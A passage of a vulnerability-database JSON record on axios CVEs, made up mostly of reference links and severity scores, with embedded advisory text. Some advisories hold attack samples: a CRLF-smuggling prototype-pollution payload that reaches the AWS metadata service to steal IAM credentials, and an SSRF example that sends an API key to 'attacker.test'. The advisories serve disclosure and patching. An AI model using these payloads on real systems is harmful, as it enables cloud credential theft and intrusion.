This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.\n\n**Severity**: Critical (CVSS 9.9)\n**Affected Versions**: All versions (v0.x - v1.x)\n**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)\n\n## Usage of \"Helper\" Vulnerabilities\nThis vulnerability is unique because it requires **Zero Direct User Input**.\nIf an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.\n\nBecause Axios does not sanitise these merged header values for CRLF (`\\r\\n`) characters, the polluted property becomes a **Request Smuggling** payload.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\nImagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:\n```javascript\nObject.prototype['x-amz-target'] = \"dummy\\r\\n\\r\\nPUT /latest/api/token HTTP/1.1\\r\\nHost: 169.254.169.254\\r\\nX-aws-ec2-metadata-token-ttl-seconds: 21600\\r\\n\\r\\nGET /ignore\";\n```\n\n### 2. The Gadget Trigger (Safe Code)\nThe application makes a completely safe, hardcoded request:\n```javascript\n// This looks safe to the developer\nawait axios.get('https://analytics.internal/pings'); \n```\n\n### 3. The Execution\nAxios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.\n\n**Resulting HTTP traffic:**\n```http\nGET /pings HTTP/1.1\nHost: analytics.internal\nx-amz-target: dummy\n\nPUT /latest/api/token HTTP/1.1\nHost: 169.254.169.254\nX-aws-ec2-metadata-token-ttl-seconds: 21600\n\nGET /ignore HTTP/1.1\n...\n```\n\n### 4. The Impact (IMDSv2 Bypass)\nThe \"Smuggled\" second request is a valid `PUT` request to the AWS Metadata Service. 
It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).\nThe Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.\n\n## Impact Analysis\n-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).\n-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.\n-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.\n\n## Recommended Fix\nValidate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.\n\n**Patch Suggestion:**\n```javascript\n// In lib/adapters/http.js\nutils.forEach(requestHeaders, function setRequestHeader(val, key) {\n  if (/[\\r\\n]/.test(val)) {\n    throw new Error('Security: Header value contains invalid characters');\n  }\n  // ... proceed to set header\n});\n```\n\n## References\n-   **OWASP**: CRLF Injection (CWE-113)\n\nThis report was generated as part of a security audit of the Axios 
library.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40175","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.0722","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.0785","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07879","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07911","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13652","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00136","scoring_system":"epss","scoring_elements":"0.33357","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46955","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46962","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00239","scoring_system":"epss","scoring_elements":"0.46982","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0053","scoring_system":"epss","scoring_elements":"0.67279","published_at":"2026-04-16T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40175"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scorin
g_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"},{"reference_url":"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/
axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"},{"reference_url":"https://github.com/axios/axios/pull/10660","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/pull/10660"},{"reference_url":"https://github.com/axios/axios/pull/10660#issuecomment-4224168081","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/10660#issuecomment-4224168081"},{"reference_url":"https://github.com/axios/axios/pull/10688","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","
scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/pull/10688"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.31.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.31.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.15.0","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.15.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L
/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40175","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40175"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2457432","reference_id":"2457432","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2457432"},{"reference_url":"https://github.com/advisories/GHSA-fvcv-3m26-pcqx","reference_id":"GHSA-fvcv-3m26-pcqx","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvcv-3m26-pcqx"},{"reference_url":"https://access.redhat.c
om/errata/RHSA-2026:10104","reference_id":"RHSA-2026:10104","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10104"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10153","reference_id":"RHSA-2026:10153","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10153"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10172","reference_id":"RHSA-2026:10172","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10172"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10175","reference_id":"RHSA-2026:10175","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10175"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:11414","reference_id":"RHSA-2026:11414","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:11414"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13542","reference_id":"RHSA-2026:13542","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13542"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13548","reference_id":"RHSA-2026:13548","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13548"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13571","reference_id":"RHSA-2026:13571","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13571"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13826","reference_id":"RHSA-2026:13826","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13826"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8483","reference_id":"RHSA-2026:8483","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8483"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8484","reference_id":"RHSA-2026:8484","reference_type":"","scores":[],"ur
l":"https://access.redhat.com/errata/RHSA-2026:8484"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8490","reference_id":"RHSA-2026:8490","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8490"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8491","reference_id":"RHSA-2026:8491","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8491"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8493","reference_id":"RHSA-2026:8493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8499","reference_id":"RHSA-2026:8499","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8499"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8500","reference_id":"RHSA-2026:8500","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8500"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8501","reference_id":"RHSA-2026:8501","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8501"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9742","reference_id":"RHSA-2026:9742","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9742"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq
8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-40175","GHSA-fvcv-3m26-pcqx"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354414?format=json","vulnerability_id":"VCID-gtc3-vrcs-yfb9","summary":"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.2, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into surgical, invisible modification of all JSON API responses — including privilege escalation, balance manipulation, and authorization bypass. The default transformResponse function at lib/defaults/index.js:124 calls JSON.parse(data, this.parseReviver), where this is the merged config object. Because parseReviver is not present in Axios defaults, not validated by assertOptions, and not subject to any constraints, a polluted Object.prototype.parseReviver function is called for every key-value pair in every JSON response, allowing the attacker to selectively modify individual values while leaving the rest of the response intact. 
This vulnerability is fixed in 1.15.2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42044","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08451","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22304","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.26665","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42044"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42044","reference_id":"CVE-2026-42044","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42044"},{"reference_url":"https://github.com/advisories/GHSA-3w6x-2g7m-8v23","reference_id":"GHSA-3w6x-2g7m-8v23","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3w6x-2g7m-8v23"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23","reference_id":"GHSA-3w6x-2g7m-8v23","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:11:49Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"}],"fixed_packages":[{"url":
"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42044","GHSA-3w6x-2g7m-8v23"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gtc3-vrcs-yfb9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29219?format=json","vulnerability_id":"VCID-hq6f-86aj-8yav","summary":"axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL\n### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n  baseURL: \"http://example.test/api/v1/users/\",\n  headers: {\n    \"X-API-KEY\": \"1234567890\",\n  },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. 
As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" > /tmp/server1/index.html \necho \"this is server2\" > /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 &\npython -m http.server -d /tmp/server2 10002 &\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this 
issue.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27152","reference_id":"","reference_type":"","scores":[{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21881","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21938","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21978","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21965","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2191","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21835","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2207","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.22018","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00212","scoring_system":"epss","scoring_elements":"0.43479","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.4436","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44282","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44363","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44442","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.4609","published_at
":"2026-04-16T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46086","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27152"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde"},{"reference_url":"https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f"},{"reference_url":"https://github.com/axios/axi
os/issues/6463","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/"}],"url":"https://github.com/axios/axios/issues/6463"},{"reference_url":"https://github.com/axios/axios/pull/6829","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6829"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.8.2","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.8.2"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6","reference_id":"","reference_type":"